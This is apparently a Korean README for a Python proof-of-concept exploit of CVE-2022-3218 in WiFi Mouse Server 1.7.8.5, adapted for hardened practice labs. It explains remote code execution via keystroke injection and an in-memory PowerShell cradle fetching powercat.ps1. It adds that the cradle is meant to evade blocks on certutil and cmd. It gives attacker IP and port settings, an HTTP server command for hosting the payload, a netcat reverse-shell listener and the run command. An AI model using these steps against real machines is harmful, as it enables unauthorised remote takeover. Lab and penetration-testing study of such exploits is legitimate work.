
WiFi Mouse Server 1.7.8.5를 대상으로 하는 CVE-2022-3218 PoC 익스플로잇으로, 키 입력 주입과 인메모리 PowerShell 페이로드 전달을 통해 RCE(원격 코드 실행)를 달성하여 보안이 강화된 랩 환경을 공략합니다.
WiFi Mouse Server v1.7.8.5용으로 최적화된 Python 3 Proof-of-Concept (PoC) 익스플로잇입니다. 이 스크립트는 자동화된 키 입력 주입을 통해 원격 코드 실행(RCE)을 달성하기 위해 프로토콜에 내재된 취약점을 활용합니다.
이 버전은 호스트 강화 제약(예: certutil.exe 실행 제한 또는 바이너리 다운로드 차단)으로 인해 기존 공개 익스플로잇이 실패하는 실습 환경을 위해 명시적으로 수정 및 조정되었습니다.
cmd.exe와 certutil.exe에 의존합니다. 강화되었거나 현대적인 시험/실습 환경에서는 이러한 LOLBins이 로컬 그룹 정책에 의해 종종 제한되거나 차단됩니다. 이 수정된 버전은 powercat.ps1을 사용하는 PowerShell 웹 크래들을 통해 벡터를 완전히 메모리로 전환합니다.스크립트를 열고 파일 상단의 구성 변수를 로컬 환경 설정에 맞게 업데이트하세요:
rhost = sys.argv[1]
lhost = "192.168.45.167" # Your Attacker/Kali IP
lport = "443" # Your Netcat Listener Port
http_port = "80" # Your local HTTP Server Port hosting powercat
로컬 공격자 머신의 디렉터리에서 powercat.ps1을 호스팅하세요:
python3 -m http.server 80
별도의 터미널 탭에서 구성된 lport로 리버스 셸 리스너를 설정하세요:
nc -lvnp 443
대상 머신 IP 주소에 대해 스크립트를 실행하세요:
python3 exploit.py <TARGET-IP>